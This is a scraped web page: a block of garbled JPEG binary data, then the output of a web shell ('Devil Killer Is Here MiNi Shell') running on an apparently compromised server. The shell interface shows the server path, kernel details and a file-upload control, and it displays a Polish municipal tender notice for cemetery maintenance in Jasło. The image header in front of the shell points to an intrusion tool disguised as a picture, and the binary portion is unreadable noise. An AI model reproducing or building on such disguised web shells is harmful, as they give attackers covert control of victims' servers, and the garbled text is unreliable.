JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241212/0064863501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Utrzymanie cmentarzy komunalnych w Jaśle i wykonanie usług cmentarnych na cmentarzach komunalnych w Jaśle. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Jasło</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440301</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jasło</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wzp@um.jaslo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://um.jaslo.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utrzymanie cmentarzy komunalnych w Jaśle i wykonanie usług cmentarnych na cmentarzach komunalnych w Jaśle. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7e603f25-bd45-41ef-9cc0-2e1e44b3a8a1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00648635</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00091172/19/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.14 Administrowanie cmentarzami komunalnymi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://um-jaslo.logintrade.net/zapytania_email,184980,8015e75886fb53dbf8599f3b083bbf25.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://um-jaslo.logintrade.net/rejestracja/rejestracja.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, , wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2.	Środkiem komunikacji elektronicznej, służącym złożeniu oferty, wymianie informacji oraz przekazywaniem dokumentów lub oświadczeń przez Wykonawcę, jest ich prawidłowe złożenie na Platformie dostępnej pod adresem https://um-jaslo.logintrade.net/rejestracja/rejestracja.html w wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z niniejszym postępowaniem. Korzystanie z Platformy Przetargowej przez Wykonawcę jest bezpłatne.<br/>3.	Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej Miasta Jasła: ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach. <br/>4.	Osoby uprawnione do porozumiewania się z wykonawcami: Sławomir Maćkoś.<br/>5.	Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy Przetargowej Miasta Jasła<br/>Dopuszczalne przeglądarki internetowe:<br/>•	Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>•	Google Chrome 31<br/>•	Mozilla Firefox 26<br/>•	Opera 18<br/>Pozostałe wymagania techniczne:<br/>•	dostęp do sieci Internet<br/>•	zainstalowana wtyczka flash - flash player - dotyczy kupca<br/>•	obsługa przez przeglądarkę protokołu XMLHttpRequest – Ajar<br/>•	włączona obsługa JavaScript<br/>•	zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>•	zainstalowany Acrobat Reader<br/>•	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/>W przypadku aukcji z podpisem elektronicznym dopuszczalne są przeglądarki internetowe:<br/>•	dla Windows Vista: Internet Explorer 8, Internet Explorer 9<br/>•	dla Windows 7: Internet Explorer 9, Internet Explorer 11<br/>•	dla Windows 8: Internet Explorer 11<br/>•	dla Windows 10: Internet Explorer 11<br/>Wspierane są rozwiązania dostarczane przez firmy:<br/>•	Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.<br/>•	Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.<br/>•	Powszechne Centrum Certyfikacji Certum firmy Asseco Data Systems S.A.<br/>•	Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Enigma SOI.<br/>Dopuszczalne formaty przesyłanych danych:<br/>image/bmp, image/x-windows-bmp, application/msword, application/drafting, image/gif, application/x-compressed, application/x-gzip, multipart/x-gzip, image/jpeg, image/pjpeg, application/x-latex, application/pdf, image/pict, image/png, application/mspowerpoint, application/postscript, application/rtf, application/x-rtf, text/richtext, image/tiff, image/x-tiff, application/mswrite, application/excel, application/x-excel, application/vnd.ms-excel, application/x-msexcel, application/vnd.ms-excel, text/xml, application/x-zip-compressed, application/zip, application/vnd.ms-office, image/x-ms-bmp, video/x-msvideo, audio/x-ms-wma, application/vnd.oasis.opendocument.spreadsheet, application/acad, application/x-acad, application/autocad_dwg, image/x-dwg, application/dwg, application/x-dwg, application/x-autocad, image/vnd.dwg, drawing/dwg</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GN.7045.32.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia jest usługa bieżącego utrzymania przez Prowadzącego następujących cmentarzy komunalnych:<br/>1.1. Cmentarza komunalnego przy ul. Mickiewicza w Jaśle wraz z parkingami obejmującego działki ewidencyjne nr 600/1, 600/2, 860, Obręb nr 16 - Kaczorowy o pow. 12,6636 ha wraz <br/>z infrastrukturą komunalną, tj.:<br/>a)	budynkiem administracyjno-mieszkalnym, w skład którego wchodzą: lokal biurowy prowadzącego, lokal użytkowy, <br/>b)	domem przedpogrzebowym wraz z wyposażeniem,<br/>c)	sektorami grzebalnymi,<br/>d)	drogami dojazdowymi i wewnętrznymi, alejkami i parkingami,( w tym parkingiem górnym przy <br/>ul. Mickiewicza,<br/>e)	siecią wewnętrzną wodociągową i kanalizacyjną cmentarza, (wraz ze zdrojami ulicznymi),<br/>f)	terenami zielonymi,<br/>g)	ogrodzeniem cmentarza,<br/>1.2. Cmentarza komunalnego przy ul. Zielonej w Jaśle obejmującego działki ewidencyjne nr 2432/2, 2432/3 i 2432/4 Obręb nr 8-Centrum o łącznej pow. 2,7161 ha wraz z infrastrukturą komunalną, tj.:<br/>a) budynkiem socjalnym,<br/>b) domem przedpogrzebowym do wystawiania trumien ze zwłokami oraz do odprawiania ceremonii pogrzebowych,<br/>c) sektorami grzebalnymi,<br/>d) drogami dojazdowymi i wewnętrznymi oraz alejkami,<br/>e) ogrodzeniem cmentarza,<br/>1.3.Cmentarza komunalnego przy ul. Gajowej w Jaśle obejmującego działkę nr 273/5 Obręb 14 -Niegłowice o pow. 1,4017 ha wraz z infrastrukturą komunalną tj:<br/> a) sektorami grzebalnymi,<br/> b) drogami dojazdowymi i wewnętrznymi, alejkami, parkingiem, <br/> c) siecią wewnętrzną wodociągową, wraz ze zdrojem ulicznym,<br/>d) terenem zielonym,<br/>e) ogrodzeniem cmentarza.<br/><br/>2. Do podstawowych obowiązków Prowadzącego cmentarze komunalne należy:<br/>Wykonywanie czynności administracyjnych i eksploatacyjnych na cmentarzach, a w szczególności:<br/>a)	prowadzenie ksiąg cmentarnych i dokumentacji cmentarzy w zakresie określonym <br/>w Rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 1 sierpnia 2001 r. w sprawie sposobu prowadzenia ewidencji grobów (Dz. U. Nr 90, poz. 1013 ze zm.),<br/>b) wystawianie faktur VAT w imieniu Miasta Jasła z 14 dniowym terminem płatności na rachunek bankowy Miasta Jasła nr : 91 8627 1011 2001 0048 6891 0026:<br/>- za miejsce na cmentarzu, wg stawek określonych uchwałą Rady Miejskiej Jasła w sprawie zasad korzystania z cmentarzy komunalnych w Jaśle, które na dzień zawarcia umowy określa Załącznik Nr 2 do umowy,<br/>- za usługi cmentarne, wg stawek ustanowionych przez Burmistrza Miasta Jasła, które na dzień zawarcia umowy określa Załącznik Nr 3 do umowy,<br/>c) nadzór nad budową i remontami grobów,<br/>d) wydawanie zezwoleń na budowę oraz remonty grobów murowanych zgodnie z zatwierdzonym planem zagospodarowania cmentarzy, z wyjątkiem wydawania zezwoleń:<br/>- na remont istniejącego grobu lub adaptację grobu ziemnego na grób murowany na terenie cmentarza komunalnego przy ul. Zielonej które wydaje Burmistrz Miasta Jasła po uprzedniej komisyjnej weryfikacji wniosku.<br/>- na prowadzenie robót budowlanych (przy grobach objętych ochroną konserwatora zabytków) na cmentarzu komunalnym przy ul. Zielonej w Jaśle oraz na podejmowanie innych działań prowadzących do naruszenia substancji cmentarza lub zmiany jego wyglądu, na które zezwolenie wydaje wojewódzki konserwator zabytków,<br/>e) utrzymanie w należytym stanie, sanitarnym i porządkowym:<br/>-	domu przedpogrzebowego wraz z kaplicą oraz toaletą- pomieszczeniem do odprawiania ceremonii pogrzebowych - przy ul. Mickiewicza,<br/>-	budynku do odprawiania ceremonii pogrzebowych przy ul. Zielonej,<br/>-	budynku socjalnego przy ul. Zielonej,<br/>-	budynku administracyjno-mieszkalnego przy ul. Mickiewicza, wraz z toaletą,<br/>oraz pokrywanie kosztów z tym związanych, a w szczególności:<br/> a.	zapewnienie odpowiedniego oświetlenia i ogrzewania budynków, dostawy do budynków energii elektrycznej, wody i odprowadzania ścieków,<br/> b.	pokrywanie kosztów ogrzewania, energii elektrycznej, wody i odprowadzania ścieków <br/>z wyłączeniem kosztów ogrzewania, energii elektrycznej, wody i odprowadzanie ścieków dotyczących lokalu mieszkalnego i lokalu użytkowego w budynku administracyjno-mieszkalnym przy ul. Mickiewicza w Jaśle, które pokrywają najemcy tych lokali wg wskazań odrębnych liczników lub w części proporcjonalnej do zajmowanej powierzchni w stosunku do powierzchni całkowitej budynku,<br/> c.	wykonywanie i pokrywanie kosztów: bieżących napraw eksploatacyjnych budynków i ich wyposażenia w zakresie obciążającym zleceniodawcę na zasadach Kodeksu Cywilnego dotyczącego wynajmującego,<br/>f) utrzymanie w należytym stanie technicznym, porządkowym i sanitarnym powierzchni cmentarzy <br/>w szczególności: dróg dojazdowych i wewnętrznych oraz alejek, parkingów, terenów zieleni przez wykonywanie cięć sanitarno-pielęgnacyjnych drzew i krzewów, wycinanie chwastów, wykaszanie trawy co najmniej jeden raz w miesiącu w okresie wegetacyjnym oraz usuwanie opadłych liści,<br/>g) zapewnienie prawidłowego działania zdrojów usytuowanych w obrębie cmentarza, oraz dostarczania wody i odprowadzenia ścieków oraz ponoszenia związanych z wywozem odpadów i nieczystości,<br/>h) zapewnienie odpowiedniej ilości kontenerów na odpady oraz wywóz odpadów, nieczystości stałych <br/>i płynnych oraz pokrywanie kosztów związanych z wywozem odpadów i nieczystości,<br/>i) zapewnienie funkcjonowania ustępów publicznych na cmentarzach przy ul. Mickiewicza oraz pokrywanie kosztów z tym związanych, w tym dodatkowo w dniach od 31.10.2025 r. do dnia 02.11.2025 r. ustawienie 2 kabin sanitarnych na cmentarzu przy ul. Mickiewicza, w tym 1 kabiny na parkingu od strony zachodniej cmentarza, 1 kabiny na parkingu przy budynku administracyjnym oraz 1 kabiny na cmentarzu przy ul. Gajowej,<br/>j) utrzymanie zimowe dróg dojazdowych i wewnętrznych, alejek, parkingów, chodników, <br/>a w szczególności odśnieżanie i usuwanie śliskości oraz pokrywanie kosztów z tym związanych,<br/>k) utrzymanie w należytym stanie estetycznym tablic ogłoszeniowych oraz tablic informacyjnych (sektorowe) umieszczonych na obiektach cmentarnych oraz pokrywanie kosztów z tym związanych,<br/>l) usuwanie skutków aktów wandalizmu na terenie przejętym w administrowanie,<br/>m) zapewnienie w siedzibie Prowadzącego cmentarze komunalne całodobowej dyspozycyjności w świadczeniu czynności związanych z przyjmowaniem zwłok i przetrzymania ich do czasu pochówku,<br/>n) zapewnienie dyspozycyjności w świadczeniu czynności określonych umową we wszystkie dni tygodnia, w tym:<br/>a/ w budynku administracyjnym przy ul. Mickiewicza 46 od poniedziałku do piątku od godz. 8.00 do godz.16.00 , w sobotę od godz. 8.00 do godz. 13.00 ,<br/>b/ w budynku przy ul. Zielonej od poniedziałku do piątku w godzinach od 8.00 do 16.00.<br/>c/ w pozostałym czasie w formie dyżuru telefonicznego.<br/>d/ udostępnianie cmentarzy dla odwiedzających w terminach zgodnych z Regulaminem cmentarzy komunalnych w Jaśle<br/>o) bieżące aktualizowanie danych w systemie „GROBONET”,<br/>B.	Wykonywanie usług cmentarnych obejmujące w szczególności:<br/>1.	wskazywanie i udostępnianie miejsc pochówku (groby, miejsca pod groby zgodnie z planami sektorów grzebalnych),<br/>2.	zapewnienie wykopania i zasypania grobu ziemnego (w przypadku nie wskazania Zakładu Pogrzebowego jako wykonawcy),<br/>3.	zapewnienie wykonania pochówku w grobie murowanym ziemnego (w przypadku nie wskazania Zakładu Pogrzebowego jako wykonawcy),<br/>4.	zapewnienie wykonania ekshumacji (w przypadku nie wskazania Zakładu Pogrzebowego jako wykonawcy),<br/>5.	wynajem kaplicy-pomieszczenia do odbywania ceremonii pogrzebowych przy ul. Mickiewicza,<br/>6.	wynajem budynku do odbywania ceremonii pogrzebowych przy ul. Zielonej,<br/>7.	przyjmowanie zwłok i przetrzymanie ich do czasu pochówku. <br/>8. nadzór nad prawidłowym wykonaniem pochówków.<br/>3. Za utrzymanie cmentarzy komunalnych w Jaśle oraz za wykonywanie usług cmentarnych na cmentarzach komunalnych w Jaśle wykonawca otrzyma wynagrodzenie miesięczne stanowiące 1/12 ceny ofertowej określonej w Formularzu Oferty (załącznik Nr 1 do SWZ).<br/>4. Wykonawca musi prowadzić działalność gospodarczą </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98371110-8 - Usługi cmentarne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> d)	zdolności technicznej lub zawodowej.<br/> Zamawiający uzna ten warunek za spełniony jeżeli wykonawcy wykażą, że:<br/>	wykonali lub wykonują w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie co najmniej jedną usługę polegającą na:<br/>a)	administrowaniu lub zarządzaniu nieruchomościami na podstawie umowy sporządzonej na piśmie <br/><br/>lub <br/><br/>b)	prowadzeniu działalności gospodarczej związanej z usługami pogrzebowymi, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługa została wykonywana, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykazu dostaw lub usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 5 000,00 zł<br/>2. Wadium musi obejmować pełen okres związania ofertą.<br/>3. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>- pieniądzu – wymaganą kwotę należy wpłacić przelewem na rachunek bankowy w banku Bank Spółdzielczy w Bieczu Oddział w Jaśle, numer rachunku 81 8627 1011 2001 0048 6891 0012 <br/><br/> Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego);<br/>- gwarancjach bankowych;<br/>- gwarancjach ubezpieczeniowych;<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę 